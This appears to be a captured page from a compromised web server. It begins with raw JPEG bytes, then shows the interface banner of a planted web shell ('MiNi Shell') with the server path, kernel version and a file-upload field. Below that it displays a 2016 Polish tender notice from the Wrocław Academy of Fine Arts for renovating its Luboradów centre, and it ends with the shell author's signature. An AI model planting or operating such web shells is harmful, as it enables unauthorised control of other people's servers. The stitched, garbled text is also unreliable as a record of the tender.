JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160204/24942-N-2016.html

<p class="kh_header"><b>Wrocław: REMONT OŚRODKA PLENEROWEGO W LUBORADOWIE,
znak postępowania ZP-1/02/2016</b><br>
<b>Numer ogłoszenia: 24942 - 2016; data zamieszczenia: 04.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 71 3438031, faks 71 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT OŚRODKA PLENEROWEGO W LUBORADOWIE,
znak postępowania ZP-1/02/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZAKRES PRZEDMIOTU ZAMÓWIENIA
Przedmiotem zamówienia jest remont przeprowadzony wewnątrz budynku plenerowego i budynku rektorówki. W budynku znajdują  się następujące  pomieszczenia:  pokoje , toalety, kuchnia,  pomieszczenia gospodarcze i magazynowe oraz sala stołówki pełniąca również funkcję sali dydaktycznej i konferencyjnej. Obiekt jest obiektem niemieszkalnym zakwalifikowanym w PKOB pod pozycją 1263 - budynki szkół i instytucji badawczych.
Planowany remont obejmuje  przecierki tynków  i malowanie  pomieszczeń, wymianę stolarki drzwiowej i okiennej,  remont instalacji c.o.  z  wykonaniem ogrzewania podłogowego w stołówce i korytarzu parteru, remont posadzek na korytarzach i w stołówce .W pracach  remontowych  uwzględniono także wymianę grzejników w budynku rektorówki.
W ramach robót stolarskich  należy  zdemontować stolarkę okienną wraz z parapetami w pomieszczeniach: pokojach  1,2,3,4,5,6,7,kuchni, stołówce, pom. gospodarczym, w  piwnicy oraz stolarkę drzwiową wraz z progami w pomieszczeniach: pokojach 1,2,3,4,5,6,7, kuchni (2 ), korytarze, łazienki na parterze (2), pom. gospodarczym  na parterze i piętrze (3). Zamontowanie stolarki okiennej w prefabrykowanymi podokiennikami: w  piwnicy o wym 0.61x0.46 x2 oraz okno podawcze 0.95x0.55, w pom. gospodarczym 1.03x1.14,na parterze 1.07x.166 x10,na piętrze 1.01x1.37x4. Zamontowanie stolarki drzwiowej w pomieszczeniach: pokojach 0.8x2.0x7,kuchni 0.8x2.0x2,łazience 0.8x2.0x2,pom. gospodarczym 0.8x2.0x3 piwnicy 0.8x2.0x1, stołówce 1.17x2.03 (drzwi dwuskrzydłowe), drzwi zewnętrzne 0.92x2,37, drzwi zewnętrzne dwuskrzydłowe 1.37x2.37.Wszystkie skrzydła drzwiowe i stolarkę okienną wyposażyć w szyldy, klamki  i zamki patentowe W ramach prac stolarskich należy również  zerwać dywaniki ze stopni drewnianych i uzupełnić schody w podstopnice dębowe o wym. 17x94 w ilości 19szt. 
W ramach robót posadzkarskich należy wykonać : rozebrać posadzki z płytek ceramicznych  w pomieszczeniach stołówki , przedsionku  przy kuchni, korytarzu  na parterze i piętrze, skuć zaprawę cementową w przedsionku przy kuchni i korytarzu na piętrze. Wykonać rozbiórkę wylewki betonowej w pom. stołówki i korytarzu na parterze i wykonanie jastrychu gr. 6cm z dodatkiem plastyfikatora w pom stołówki i na korytarzu po uprzednim wykonaniu ogrzewania podłogowego w tych pomieszczeniach. Wykonanie posadzek z kamieni sztucznych wraz z cokolikami  po uprzednim zagruntowaniu i wykonaniu wylewek samopoziomujących  w pomieszczeniach:  stołówce, przedsionku przy kuchni  i  korytarzu na parterze i piętrze. W ramach prac przewidziano wymianę luster na parterze i piętrze w ilości 7,66m2 W ramach robót tynkarskich przewidziano przecierkę  istniejących tynków z zeskrobaniem farby  w pomieszczeniach: pokojach 1,2,3,4,5,6,7, stołówce, klatce schodowej, korytarzach  na parterze i piętrze, przedsionku przy kuchni. W pomieszczeniach wskazanych powyżej należy zabezpieczyć podłogę folią oraz zabezpieczyć stolarkę okienną i drzwiową, a następnie zagruntować ściany , sufity i pomalować 2x  farbami emulsyjnymi. Powierzchnie drewniane schodów , barier schodowych, podbitek dachowych , zadaszeń nad wejściami, ławek drewnianych należy przeszlifować i pomalować trzykrotnie lakierem bezbarwnym. Wymienić  kratki wentylacyjne w  ilości 7szt.Skuć  płytki ścienne w ilości 2,4x1.1 m2 i uzupełnić tynk. Wykonać obudowę ościeży okien i wyłazu płytami gipsowymi z przyklejeniem narożników ochronnych aluminiowych i z wypełnieniem styków uszczelniaczem akrylowym przy ościeżach. Dwukrotne lakierowanie stolarki okiennej w sanitariatach i na parterze. Malowanie powierzchni metalowych drzwiczek farbami olejnymi. 
W ramach robót instalacji centralnego ogrzewania zdemontować rurociągi o średnicy od fi 15-32mm  w piwnicy, stołówce, korytarzu na parterze i piętrze, kuchni, pokojach 1-7. Zdemontować grzejniki żeliwne 20 szt. w tym 3 szt. w pom. rektorówki, wykuć bruzdy w ścianach , przebicia w stropach wraz z osadzeniem tulei. Wykonać instalację co z rur polipropylenowych, osadzić w bruzdach, zamurować i zatynkować. Na instalacjach zamontować zawory przelotowe i zwrotne, przeprowadzić próbę szczelności. Instalację co należy zabezpieczyć otuliną termoizolacyjną z pianki polietylenowej. Zamontować grzejniki stalowe dwupłytowe w kuchni 1000x600, pom. gospodarczym 600x600,pokoju nr3 600x 600x2, rektorówce 600x 600 x2, pokojach1-7 -1200x600, rektorówce 1400x600. Montaż szafki rozdzielczowej HSP4, rozdzielacza HP03/16, zaworu mieszającego 1 kpl. Wykonać montaż ogrzewania podłogowego w układzie wężownicy ślimakowej w stołówce i na korytarzu na parterze.
Instalacje elektryczne . Przerobienie instalacji zasilającej wentylator z schowaniem instalacji pod tynk. Wymiana opraw żarowych na plafoniery 42 szt , wymiana wyłączników 43 szt, wymiana gniazd 29 szt. 
Wszystkie materiały z rozbiórki należy wywieść z budowy na wysypisko z wyłączeniem stolarki okiennej, drzwiowej, elementów drewnianych, które należy przekazać osobie odpowiedzialnej ze strony ASP  Krystianowi Napieraj.
Wykonawca zobligowany jest na własny koszt do oznakowania i zabezpieczenia robót. 
Szczegółowy opis przedmiotu zamówienia opisuje:
Specyfikacja Techniczna Wykonania i Odbioru Robót (STWiOR) - stanowiąca załącznik nr 10 do SIWZ
Dokumentacja fotograficzna i zestawienie stolarki okiennej - stanowiąca załącznik nr 11 do SIWZ
Ww. dokumentacja jest podstawą do wykonania zadania. 
Zamawiający dołączył wyłącznie poglądowo przedmiar robót - stanowiący załącznik nr 9 do SIWZ.
Wymagany minimalny okres gwarancji jakości i rękojmi na zrealizowane roboty budowlane wynosi 60 miesięcy. Okres gwarancji liczony będzie od daty podpisania przez Zamawiającego końcowego protokołu odbioru. Warunki gwarancji na roboty budowlane zostały określone w projekcie umowy stanowiącym załącznik nr 8 do SIWZ. 
Szczegółowe warunki i zasady realizacji umowy określa projekt umowy (załączniki nr 8 do niniejszej SIWZ). 
Zaleca się, aby Wykonawcy dokonali wizji lokalnej terenu budowy przed złożeniem oferty. Zamawiający ustala termin wizji lokalnej na dzień 10-02-2016 o godz. 10:00 
W celu uczestnictwa w wizji Wykonawcy proszeni są o przybycie do Ośrodka Plenerowego  Zamawiającego tj. Domu Pracy Twórczej w Luboradowie adres Luboradów 2, 56-320 Krośnice
Osobą odpowiedzialną ze strony Zamawiającego za przeprowadzenie wizji lokalnej będzie Leszek Domagalski. 
Z przeprowadzonej wizji lokalnej zostanie sporządzona notatka, która będzie udostępniona na stronie internetowej oraz na tablicy ogłoszeń Zamawiającego. 
W związku z powyższym wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny ryczałtowej brutto. Koszt wizji lokalnej ponosi Wykonawca..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.00.00-7, 45.43.21.10-8, 45.41.00.00-4, 45.43.10.00-7, 45.44.21.00-8, 45.33.11.00-7, 45.31.70.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium.
2.	Zamawiający ustala kwotę wadium na: 5 000,00 zł (pięć tysięcy złotych 00/100). 
3.	Wadium może być wnoszone w następujących formach:
1)	w pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach bankowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).
4.	Wadium Wykonawca musi wnieść przed upływem terminu składania ofert tj. do 19-02-2016r. do godz. 10:00, na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
5.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:
ING Bank Śląski S.A. o/Wrocław nr 93 1050 1575 1000 0005 0269 6594, 
z podaniem nazwy przetargu - wadium na przetarg ZP-1/02/2016
6.	Wniesienie wadium w pieniądzu, w formie przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert tj. do 19-02-2016r. do godz. 10:00.
7.	Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
8.	Oryginał dokumentu wadialnego ma być zdeponowany w Kasie ASP we Wrocławiu. Wadium można składać od poniedziałku do piątku w godz. 12:00-14:00, a w dniu otwarcia ofert od godz. 8:30 (pok. 111, Ip).
9.	Zaleca się, aby do oferty Wykonawca załączył kserokopię wpłaty wadium (w przypadku wniesienia wadium w formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że należycie wykonał tj. zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie:
- co najmniej jedną robotę budowlaną o wartości nie mniejszej niż 200 000 zł brutto w ramach jednej umowy, w zakres której wchodził remont pomieszczeń. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia przez Wykonawcę warunku dysonowania odpowiednim potencjałem technicznym Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia przez Wykonawcę warunku dysponowania osobami zdolnymi do wykonania zamówienia powinien wykazać, że na czas realizacji zamówienia będzie dysponował osobami posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2010 r. nr 243, poz. 1623 z poźn. zm.) i Rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z dnia 16 maja 2006r. nr 83 poz. 578 z poźn. zm.) lub których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych: 
kierownik budowy posiadający uprawnienia budowlane do kierowania budową lub robotami budowlanymi w specjalności konstrukcyjno-budowlanej. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ustawy Pzp - złącznik nr 3 do SIWZ (oryginał).
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty-załącznik nr 1 do SIWZ.
2)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków (o ile dotyczy).
3)	Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
4)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy możliwe będą pod warunkiem wystąpienia następujących okoliczności w trakcie realizacji umowy podstawowej: 
a)	w przypadku wystąpienia siły wyższej termin umowy może ulec zmianie o czas konieczny do usunięcia jej skutków. 
b)	w przypadku konieczności wprowadzenia zmian osób wskazanych w umowie z przyczyn niezależnych od Zamawiającego lub Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu
Pl. Polski 3/4, 50-156 Wrocław
Sekcja ds. Przetargów (pok. 217P, II piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2016 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu
Pl. Polski 3/4, 50-156 Wrocław
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com